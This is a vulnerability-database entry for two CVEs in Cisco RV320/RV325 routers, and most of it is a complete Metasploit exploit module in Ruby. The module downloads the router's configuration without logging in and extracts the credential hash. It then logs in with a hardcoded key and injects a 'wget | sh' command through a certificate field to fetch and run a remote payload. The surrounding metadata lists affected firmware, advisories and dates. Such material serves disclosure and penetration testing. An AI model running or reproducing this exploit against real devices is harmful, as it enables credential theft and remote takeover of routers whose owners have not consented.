ID

VAR-E-201904-0315


CVE

cve_id:CVE-2019-1653

Trust: 4.3

cve_id:CVE-2019-1652

Trust: 2.8

sources: BID: 106728 // BID: 106732 // PACKETSTORM: 152261 // PACKETSTORM: 152262 // PACKETSTORM: 151313 // PACKETSTORM: 151374 // PACKETSTORM: 151311 // PACKETSTORM: 151312 // PACKETSTORM: 152260 // PACKETSTORM: 152305 // EXPLOIT-DB: 46655

EDB ID

46655


TITLE

Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit) - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 46655

DESCRIPTION

Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit). CVE-2019-1653CVE-2019-1652 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 46655

AFFECTED PRODUCTS

vendor:ciscomodel:rv320scope: - version: -

Trust: 3.0

vendor:ciscomodel:rv320 and rv325scope: - version: -

Trust: 1.6

vendor:ciscomodel:rv325 dual gigabit wan vpn routerscope:eqversion:1.4.2.17

Trust: 0.6

vendor:ciscomodel:rv325 dual gigabit wan vpn routerscope:eqversion:1.4.2.15

Trust: 0.6

vendor:ciscomodel:rv320 dual gigabit wan vpn routerscope:eqversion:1.4.2.17

Trust: 0.6

vendor:ciscomodel:rv320 dual gigabit wan vpn routerscope:eqversion:1.4.2.15

Trust: 0.6

vendor:ciscomodel:rv325 dual gigabit wan vpn routerscope:neversion:1.4.2.20

Trust: 0.6

vendor:ciscomodel:rv320 dual gigabit wan vpn routerscope:neversion:1.4.2.20

Trust: 0.6

vendor:ciscomodel:rv300 rv320scope:eqversion:/

Trust: 0.5

vendor:ciscomodel:rv320 rv325 unauthenticatedscope:eqversion:/

Trust: 0.5

vendor:ciscomodel:rv325 dual gigabit wan vpn routerscope:eqversion:1.4.2.19

Trust: 0.3

vendor:ciscomodel:rv325 dual gigabit wan vpn routerscope:eqversion:1.4.2.18

Trust: 0.3

vendor:ciscomodel:rv325 dual gigabit wan vpn routerscope:eqversion:1.4.2.16

Trust: 0.3

vendor:ciscomodel:rv320 dual gigabit wan vpn routerscope:eqversion:1.4.2.19

Trust: 0.3

vendor:ciscomodel:rv320 dual gigabit wan vpn routerscope:eqversion:1.4.2.18

Trust: 0.3

vendor:ciscomodel:rv320 dual gigabit wan vpn routerscope:eqversion:1.4.2.16

Trust: 0.3

vendor:ciscomodel:rv325 dual gigabit wan vpn routerscope:neversion:1.4.2.19

Trust: 0.3

vendor:ciscomodel:rv320 dual gigabit wan vpn routerscope:neversion:1.4.2.19

Trust: 0.3

sources: BID: 106728 // BID: 106732 // PACKETSTORM: 152261 // PACKETSTORM: 152262 // PACKETSTORM: 151313 // PACKETSTORM: 151374 // PACKETSTORM: 151311 // PACKETSTORM: 151312 // PACKETSTORM: 152260 // PACKETSTORM: 152305 // EXPLOIT-DB: 46655 // EDBNET: 101277

EXPLOIT

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::CmdStager

def initialize(info={})
super(update_info(info,
'Name' => "Cisco RV320 and RV325 Unauthenticated Remote Code Execution",
'Description' => %q{
This exploit module combines an information disclosure (CVE-2019-1653)
and a command injection vulnerability (CVE-2019-1652) together to gain
unauthenticated remote code execution on Cisco RV320 and RV325 small business
routers. Can be exploited via the WAN interface of the router. Either via HTTPS
on port 443 or HTTP on port 8007 on some older firmware versions.
},
'License' => MSF_LICENSE,
'Author' => [
'RedTeam Pentesting GmbH', # Discovery, Metasploit
'Philip Huppert', # Discovery
'Benjamin Grap' # Metasploit
],
'References' => [
[ 'CVE','2019-1653' ],
[ 'CVE','2019-1652' ],
[ 'EDB','46243' ],
[ 'BID','106728' ],
[ 'BID','106732' ],
[ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export' ],
[ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection' ]
],
'Platform' => 'linux',
'Targets' =>
[
[ 'LINUX MIPS64',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPS64
}
]
],
'Payload' =>
{
'BadChars' => ""
},
'CmdStagerFlavor' => [ 'bourne' ],
'Privileged' => true,
'DisclosureDate' => "Sep 9 2018",
'DefaultTarget' => 0))

register_options([
Opt::RPORT(8007), # port of Cisco webinterface
OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)', '/']),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]),
OptBool.new('USE_SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]) # Don't use 'SSL' option to prevent HttpServer from picking this up.
])
deregister_options('SSL') # prevent SSL in HttpServer and resulting payload requests since the injected wget command will not work with '--no-check-certificate' option.
deregister_options('SSLCert') # not required since stager only uses HTTP.
end

def execute_command(cmd, opts = {})
# use generated payload, we don't have to do anything here
end

def autofilter
true
end

def on_request_uri(cli, req)
print_status("#{peer} - Payload request received: #{req.uri}")
@cmdstager = generate_cmdstager().join(';')
send_response(cli, "#{@cmdstager}")
end

def primer
payload_url = get_uri
print_status("Downloading configuration from #{peer}")
if(datastore['USE_SSL'])
print_status("Using SSL connection to router.")
end
res = send_request_cgi({
'uri' => normalize_uri("cgi-bin","config.exp"),
'SSL' => datastore['USE_SSL']
})
unless res
vprint_error('Connection failed.')
return nil
end

unless res.code == 200
vprint_error('Could not download config. Aborting.')
return nil
end

print_status("Successfully downloaded config")
username = res.body.match(/^USERNAME=([a-zA-Z]+)/)[1]
pass = res.body.match(/^PASSWD=(\h+)/)[1]
authkey = "1964300002"
print_status("Got MD5-Hash: #{pass}")
print_status("Loging in as user #{username} using password hash.")
print_status("Using default auth_key #{authkey}")
res2 = send_request_cgi({
'uri' => normalize_uri("cgi-bin","userLogin.cgi"),
'SSL' => datastore['USE_SSL'],
'method' => 'POST',
'data' => "login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch&current_password=&new_password=&re_new_password="
})

unless res
vprint_error('Connection failed during login. Aborting.')
return nil
end

unless res.code == 200
vprint_error('Login failed with downloaded credentials. Aborting.')
return nil
end

#Extract authentication cookies
cookies = res2.get_cookies()
print_status("Successfully logged in as user #{username}.")
print_status("Got cookies: #{cookies}")
print_status("Sending payload. Staging via #{payload_url}.")
#Build staging command
command_string = CGI::escape("'$(wget -q -O- #{payload_url}|sh)'")
if(command_string.length <= 63)
print_status("Staging command length looks good. Sending exploit!")
else
vprint_error("Warning: Staging command length probably too long. Trying anyway...")
end

res3 = send_request_cgi({
'uri' => normalize_uri("certificate_handle2.htm"),
'SSL' => datastore['USE_SSL'],
'method' => 'POST',
'cookie' => cookies,
'vars_get' => {
'type' => '4',
},
'vars_post' => {
'page' => 'self_generator.htm',
'totalRules' => '1',
'OpenVPNRules' => '30',
'submitStatus' => '1',
'log_ch' => '1',
'type' => '4',
'Country' => 'A',
'state' => 'A',
'locality' => 'A',
'organization' => 'A',
'organization_unit' => 'A',
'email' => 'any@example.com',
'KeySize' => '512',
'KeyLength' => '1024',
'valid_days' => '30',
'SelectSubject_c' => '1',
'SelectSubject_s' => '1'
},
'data' => "common_name=#{command_string}"
})
unless res3
vprint_error('Connection failed while sending command. Aborting.')
return nil
end

unless res3.code == 200
vprint_error('Sending command not successful.')
return nil
end
print_status("Sending payload timed out. Waiting for stager to connect...")
end

def check
#Check if device is vulnerable by downloading the config
res = send_request_cgi({'uri'=>normalize_uri("cgi-bin","config.exp")})

unless res
vprint_error('Connection failed.')
return CheckCode::Unknown
end

unless res.code == 200
return CheckCode::Safe
end

unless res.body =~ /PASSWD/
return CheckCode::Detected
end

CheckCode::Vulnerable
end

def exploit
# Main function.
# Setting delay for the Stager.
Timeout.timeout(datastore['HTTPDELAY']) {super}
rescue Timeout::Error
print_status("Waiting for stager connection timed out. Try increasing the delay.")
end
end

Trust: 1.0

sources: EXPLOIT-DB: 46655

EXPLOIT LANGUAGE

rb

Trust: 0.6

sources: EXPLOIT-DB: 46655

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 46655

TYPE

Unauthenticated Remote Code Execution (Metasploit)

Trust: 1.6

sources: EXPLOIT-DB: 46655 // EDBNET: 101277

TAGS

tag:exploit

Trust: 4.0

tag:web

Trust: 3.5

tag:info disclosure

Trust: 1.0

tag:Metasploit Framework (MSF)

Trust: 1.0

tag:remote

Trust: 0.5

tag:code execution

Trust: 0.5

sources: PACKETSTORM: 152261 // PACKETSTORM: 152262 // PACKETSTORM: 151313 // PACKETSTORM: 151374 // PACKETSTORM: 151311 // PACKETSTORM: 151312 // PACKETSTORM: 152260 // PACKETSTORM: 152305 // EXPLOIT-DB: 46655

CREDITS

Metasploit

Trust: 0.6

sources: EXPLOIT-DB: 46655

EXTERNAL IDS

db:NVDid:CVE-2019-1653

Trust: 4.3

db:NVDid:CVE-2019-1652

Trust: 2.8

db:EXPLOIT-DBid:46655

Trust: 1.6

db:EDBNETid:101277

Trust: 0.6

db:PACKETSTORMid:152261

Trust: 0.5

db:PACKETSTORMid:152262

Trust: 0.5

db:PACKETSTORMid:151313

Trust: 0.5

db:PACKETSTORMid:151374

Trust: 0.5

db:PACKETSTORMid:151311

Trust: 0.5

db:PACKETSTORMid:151312

Trust: 0.5

db:PACKETSTORMid:152260

Trust: 0.5

db:PACKETSTORMid:152305

Trust: 0.5

db:BIDid:106728

Trust: 0.3

db:BIDid:106732

Trust: 0.3

sources: BID: 106728 // BID: 106732 // PACKETSTORM: 152261 // PACKETSTORM: 152262 // PACKETSTORM: 151313 // PACKETSTORM: 151374 // PACKETSTORM: 151311 // PACKETSTORM: 151312 // PACKETSTORM: 152260 // PACKETSTORM: 152305 // EXPLOIT-DB: 46655 // EDBNET: 101277

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2019-1653

Trust: 4.0

url:https://nvd.nist.gov/vuln/detail/cve-2019-1652

Trust: 2.5

url:https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/cisco_rv32x_rce.rb

Trust: 1.0

url:https://software.cisco.com/download/home/284005929/type/282465789/release/1.4.2.20

Trust: 0.6

url:https://software.cisco.com/download/home/284005936/type/282465789/release/1.4.2.20

Trust: 0.6

url:http://www.cisco.com/

Trust: 0.6

url:https://www.exploit-db.com/exploits/46655/

Trust: 0.6

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190123-rv-inject

Trust: 0.3

url:https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection

Trust: 0.3

url:https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-003/-cisco-rv320-unauthenticated-diagnostic-data-retrieval

Trust: 0.3

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190123-rv-info

Trust: 0.3

sources: BID: 106728 // BID: 106732 // PACKETSTORM: 152261 // PACKETSTORM: 152262 // PACKETSTORM: 151313 // PACKETSTORM: 151374 // PACKETSTORM: 151311 // PACKETSTORM: 151312 // PACKETSTORM: 152260 // PACKETSTORM: 152305 // EXPLOIT-DB: 46655 // EDBNET: 101277

SOURCES

db:BIDid:106728
db:BIDid:106732
db:PACKETSTORMid:152261
db:PACKETSTORMid:152262
db:PACKETSTORMid:151313
db:PACKETSTORMid:151374
db:PACKETSTORMid:151311
db:PACKETSTORMid:151312
db:PACKETSTORMid:152260
db:PACKETSTORMid:152305
db:EXPLOIT-DBid:46655
db:EDBNETid:101277

LAST UPDATE DATE

2024-03-21T15:09:38.469000+00:00


SOURCES UPDATE DATE

db:BIDid:106728date:2019-01-23T00:00:00
db:BIDid:106732date:2019-01-23T00:00:00

SOURCES RELEASE DATE

db:BIDid:106728date:2019-01-23T00:00:00
db:BIDid:106732date:2019-01-23T00:00:00
db:PACKETSTORMid:152261date:2019-03-27T17:54:50
db:PACKETSTORMid:152262date:2019-03-27T17:55:45
db:PACKETSTORMid:151313date:2019-01-24T16:40:26
db:PACKETSTORMid:151374date:2019-01-29T00:48:50
db:PACKETSTORMid:151311date:2019-01-24T16:37:19
db:PACKETSTORMid:151312date:2019-01-24T16:39:16
db:PACKETSTORMid:152260date:2019-03-27T17:49:07
db:PACKETSTORMid:152305date:2019-03-30T00:52:21
db:EXPLOIT-DBid:46655date:2019-04-03T00:00:00
db:EDBNETid:101277date:2019-04-03T00:00:00